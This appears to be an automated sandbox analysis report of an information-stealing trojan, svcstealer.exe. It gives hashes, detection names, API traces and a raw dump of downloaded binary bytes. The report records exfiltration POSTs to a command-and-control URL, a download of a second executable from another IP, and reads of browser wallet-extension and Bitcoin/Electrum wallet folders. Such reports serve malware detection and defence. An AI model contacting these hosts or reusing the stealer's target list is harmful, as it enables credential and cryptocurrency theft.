Summary | ZeroBOX

svcstealer.exe

Browser Login Data Stealer Generic Malware Malicious Library UPX PE64 PE File OS Processor Check ZIP Format JPEG Format
Category Machine Started Completed
FILE s1_win7_x6403_us April 26, 2025, 2:20 p.m. April 26, 2025, 2:24 p.m.
Size 1.2MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 763ba270b3a70837d7934e6a7fd5d8be
SHA256 d954b8d3e0481a3d9b5c3c6342af84ebf619bc07d3020188222e6d225cc505e7
CRC32 1DC37D94
ssdeep 24576:8dDEllSAUzNwP9b1UcX1rX+O4k+rUPnKH:8xEllqaP9DrX+sK
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • infoStealer_browser_b_Zero - browser info stealer
  • Malicious_Library_Zero - Malicious_Library
  • Generic_Malware_Zero - Generic Malware
  • OS_Processor_Check_Zero - OS Processor Check
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
185.39.17.158 Active Moloch
80.64.16.35 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://185.39.17.158/svcstealer/get.php
suspicious_features Connection to IP address suspicious_request GET http://80.64.16.35/fgg.exe
request POST http://185.39.17.158/svcstealer/get.php
request GET http://80.64.16.35/fgg.exe
request POST http://185.39.17.158/svcstealer/get.php
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfchfdkjhcoekhdldggegebfakaaiog\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckklhkaabbmdjkahiaaplikpdddkenic\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oafedfoadhdjjcipmcbecikgokpaphjk\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnlhokffphohmfcddnibpohmkdfafdli\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\
file C:\Users\test22\AppData\Local\Temp\temp_16958.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÍF•o‰'û<‰'û<‰'û<Â_ø=Œ'û<Â_þ=''û<Â_ÿ=™'û<J¤ø=ƒ'û<J¤ÿ=™'û<Â_ú=Œ'û<‰'ú<ï'û<J¤þ=Ø'û<£ò=ˆ'û<£ù=ˆ'û<Rich‰'û<PEd†œN hð" ( dÀ@0`<«<ðü$ ô 0b8ð`@°Ð.text¼Ÿ  `.rdataª°¤@@.dataT-Àª@À.pdataü$ð&À@@.relocô  æ@BH‹ÄH‰XH‰pUWATAVAWHl$€Hì€)pÈWÀD$PWÉfL$`¿D‹ÇH HHL$PèÓ[WÀD$pWÉfM€_D‹ÃH½GHL$pè«[WÀEWÉfM D‹ÇHíGHMèˆ[WÀE°WÉfMÀDG'HGHM°èd[WÀEÐWÉfMàD‹ÇHÎGHMÐèA[WÀEðWÉfMD‹ÃH‡GHMðè[WÀEWÉfM D‹ÇH°GHMèûZWÀE0WÉfM@D‹ÃHiGHM0èØZHƒ%×ÛHƒ%×ۍO]è‡éL‹àH‰H‰@H‰@fÇ@H‰¬ÛH]ˆH=¡ÛLsÈM‹ÎM‹ÄHUPè¶}0ò@òD$@€|$@…ÎH¸ªªªªªªªH9lÛ„L‹=WÛH‰|$ Hƒd$(¹`èéH‹øH‰D$(Hp H‰µ°WÀHƒfHƒfHƒ{àvM‹6L‹CØI‹ÖH‹Îè¾ZHN WÀHƒaHƒaHSèHƒ;vH‹L‹Cøè“ZL‰?L‰L‰fƒgHƒd$(ót$0L‹ÇHT$0H=¯ÚH‹ÏèbHƒÃ@HCÈHMPH;Á…ñþÿÿL Kº@DBÄHL$PètèH ù›Lœ$€I‹[8I‹s@A(sðI‹ãA_A^A\_]é@ëèóÌÌH‰\$H‰t$UWAVH¬$ÿÿÿHìð3ÿH‰}˜HE H‰…DwAŠÎèÊ×H‰E¸HM°èé\H‰E HM°è RH‰E¨LÐEH†EHM˜èÍVLE˜HíDHMÐèpSH‰|$pHD$xH‰…AŠÎèf×H‰EHMˆè…\H‰D$xHMˆè;RH‰E€L…EHiEHL$pègVLD$pH¶DHMè SH‰|$HHD$PH‰…AŠÎèÿÖH‰D$hHL$`è\H‰D$PHL$`èÑQH‰D$XLFEHEHL$HèüULD$HHsDHM`èžRH‰|$ HD$(H‰…AŠÎè”ÖH‰D$@HL$8è±[H‰D$(HL$8èfQH‰D$0L EHÛDHL$ è‘ULD$ H0DH¨è0RHEÐH‰EÀH…ðH‰EÈ(EÀfEÀHUÀèfCL ¶WHDGHMÐè>搃ÎÿH‹L$ H…Ét,‹ÆðÁA,Æu!H‹\$ ëH‹ËHCH‹H‰8H‹A‹ÖÿH…ÛuæH‰|$ H‹L$@H…ÉtH‹ÿPH…ÀtH‹L‹A‹ÖH‹ÈAÿАH‹L$HH…Ét,‹ÆðÁA,Æu!H‹\$HëH‹ËHCH‹H‰8H‹A‹ÖÿH…ÛuæH‰|$HH‹L$hH…ÉtH‹ÿPH…ÀtH‹L‹A‹ÖH‹ÈAÿАH‹L$pH…Ét,‹ÆðÁA,Æu!H‹\$pëH‹ËHCH‹H‰8H‹A‹ÖÿH…ÛuæH‰|$pH‹MH…ÉtH‹ÿPH…ÀtH‹L‹A‹ÖH‹ÈAÿАH‹M˜H…Ét+‹ÆðÁA,Æu H‹]˜ëH‹ËHCH‹H‰8H‹A‹ÖÿH…ÛuæH‰}˜H‹M¸H…ÉtH‹ÿPH…Àt L‹A‹ÖH‹ÈAÿH T˜Lœ$ðI‹[(I‹s0I‹ãA^_]é˜çHƒì(H Á¾èLÎH -˜HƒÄ(éxçH …˜élçH ˜é`çHƒì(H ÁèÎH ݘHƒÄ(é@çH ˜é4çÌÌÌÌÌÌÌÌ@SHƒì H‹ÙH‹ÂH õœWÀH‰ HSHHè#H‹ÃHƒÄ [ÃÌÌHƒyH@HEAÃÌÌH‰\$WHƒì H¯œH‹ùH‰‹ÚHƒÁèröÃt ºH‹ÏètãH‹\$0H‹ÇHƒÄ _ÃÌÌHuœH‰HƒÁé=ÌHƒaHÄ?H‰AH ²H‰H‹ÁÃÌÌHƒìHHL$ èÒÿÿÿH[“HL$ è1Ì@SHƒì H‹ÙH‹ÂH œWÀH‰ HSHHèCH°±H‰H‹ÃHƒÄ [Ã@SHƒì H‹ÙH‹ÂH ٛWÀH‰ HSHHèHԛH‰H‹ÃHƒÄ [ÃHƒì(Hƒ'H‹H‹PøH+ÂHƒÀøHƒøwH‰HƒÄ(Ãè_\ÌÌÌHƒì(H ù>èTÐÌÌÌÌ@SHƒì@H‹+¨H3ÄH‰D$0HƒzL‹ÂH‹ÙvL‹HQL‰D$ H;›ÆD$(H‰WÀHL$ ègÿHŒ›H‰H‹ÃH‹L$0H3ÌèÑáHƒÄ@[ÃÌÌÌ@SHƒì H‹ÙH‹ÂH íšWÀH‰ HSHHèÿH@›H‰H‹ÃHƒÄ [ÃD‰H‹ÂH‰JÃÌ@SHƒì0H‹I‹ØD‹ÂHT$ ÿPH‹KL‹HH‹QI9Qu ‹ 9u°ë2ÀHƒÄ0[ÃÌH‹BL‹HL9IuD9u°Ã2ÀÃÌÌÌHA³‰H‰AH‹ÁÃÌÌÌL‰D$H‰L$SVWHƒì`H‹ü¦H3ÄH‰D$PI‹ØH‹òH‹ùH‰L$HH‰\$HIƒxtA¸H•=H‹Ëè HH‹NH‹D‹HT$(ÿPHT$(¾H9t$@HGT$(L‹D$8H‹ËèÔGH‹T$@H;Öv.HÿÂH‹L$(H‹ÁHúrHƒÂ'H‹IøH+ÁHƒÀøHƒøwSèwàWÀHƒgHƒgKOHƒcH‰sÆHƒcH‰sÆH‹ÇH‹L$PH3ÌèàHƒÄ`_^[ÃèZÌÌÌ@USWH‹ìHƒìpH‰M°I‹ÀHƒeÐWÀHƒeØH‹úM‹@H‹ÙHƒxEÀvH‹H‹ÐHMÀèÝQLEÀHU°HMàóE°èþÿÿH‹ÐH‹ËèaýÿÿH‹UøHƒúv-H‹MàHÿÂH‹ÁHúrH‹IøHƒÂ'H+ÁHƒÀøHƒøw"è‚ßH0°H‰H‹ÃóCHƒÄp_[]ÃèPYÌÌÌÌH‰\$WHƒì Hc˜H‹ùH‰‹ÚHƒÁè&ýöÃt º(H‹Ïè(ßH‹\$0H‹ÇHƒÄ _ÃÌÌH‰\$ WHƒìPI‹ÀH‹úH‹ÙH‰L$ WÀD$0WÉóL$@IƒÈÿIÿÀB€<uöH
request_handle: 0x0000000000cc0024
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x00000000000000b8
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x000000000000019c
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x000000000000019c
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x000000000000019c
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x000000000000019c
process_name: pw.exe
process_identifier: 1028
0 0

Process32NextW

snapshot_handle: 0x0000000000000164
process_name: 
process_identifier: 1070279616
0 0

Process32NextW

snapshot_handle: 0x00000000000001fc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000001fc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000001fc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000002f8
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000002f8
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000002f8
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000300
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000300
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000300
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000300
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x00000000000000cc
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: WmiPrvSE.exe
process_identifier: 2096
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: svchost.exe
process_identifier: 2320
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: svchost.exe
process_identifier: 2320
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: svchost.exe
process_identifier: 2320
0 0

Process32NextW

snapshot_handle: 0x0000000000000304
process_name: svchost.exe
process_identifier: 2320
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000310
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000328
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000328
process_name: sppsvc.exe
process_identifier: 2440
0 0

Process32NextW

snapshot_handle: 0x0000000000000328
process_name: sppsvc.exe
process_identifier: 2440
0 0
wmi SELECT * FROM Win32_BIOS
host 185.39.17.158
host 80.64.16.35
file C:\Users\test22\AppData\Roaming\Bitcoin\
file C:\ProgramData\65EDB51284023538805469\Wallets\Bitcoin\
file C:\Users\test22\AppData\Roaming\Electrum\wallets\
file C:\ProgramData\65EDB51284023538805469\Wallets\Electrum\
file C:\Users\test22\AppData\Local\Temp\temp_16958.exe
wmi SELECT * FROM AntiVirusProduct
wmi SELECT * FROM Win32_BIOS
Lionic Trojan.Win32.Stealer.12!c
Cynet Malicious (score: 99)
CAT-QuickHeal Trojan.Ghanarava.1745624472d5d8be
ALYac Gen:Variant.Lazy.657986
Cylance Unsafe
Sangfor Spyware.Win32.Lazy.Vskc
CrowdStrike win/malicious_confidence_100% (W)
BitDefender Gen:Variant.Lazy.657986
K7GW Spyware ( 005bffa41 )
K7AntiVirus Spyware ( 005bffa41 )
Arcabit Trojan.Lazy.DA0A42
VirIT Trojan.Win32.GenusT.EVUF
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win64/Spy.Agent.ML
Avast Win64:Evo-gen [Trj]
Kaspersky Trojan-Spy.Win32.Stealer.flrd
Alibaba TrojanSpy:Win64/Nekark.87900a44
MicroWorld-eScan Gen:Variant.Lazy.657986
Rising Stealer.OskiStealer!1.C41E (CLASSIC)
Emsisoft Gen:Variant.Lazy.657986 (B)
F-Secure Trojan.TR/AD.Nekark.qqbgt
DrWeb Trojan.Siggen31.14557
VIPRE Gen:Variant.Lazy.657986
McAfeeD ti!D954B8D3E048
CTX exe.trojan.lazy
Sophos Mal/Generic-S
SentinelOne Static AI - Malicious PE
Webroot Win.Malware.Gen
Google Detected
Avira TR/AD.Nekark.qqbgt
Antiy-AVL Trojan[Spy]/Win32.Stealer
Kingsoft malware.kb.a.739
Gridinsoft Spy.Win64.Keylogger.sa
Microsoft Trojan:Win32/Kepavll!rfn
ViRobot Trojan.Win.Z.Lazy.1242624.A
GData Gen:Variant.Lazy.657986
Varist W64/ABTrojan.OEER-2067
AhnLab-V3 Trojan/Win.Generic.R698804
McAfee Artemis!763BA270B3A7
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.3964926470
Panda Trj/GdSda.A
TrendMicro-HouseCall TROJ_GEN.R002H09DE25
Tencent Malware.Win32.Gencirc.146a07b9
huorong TrojanSpy/Stealer.ot
Fortinet W64/Agent.ML!tr
AVG Win64:Evo-gen [Trj]
Paloalto generic.ml
alibabacloud Trojan[spy]:Win/Lazy.Gen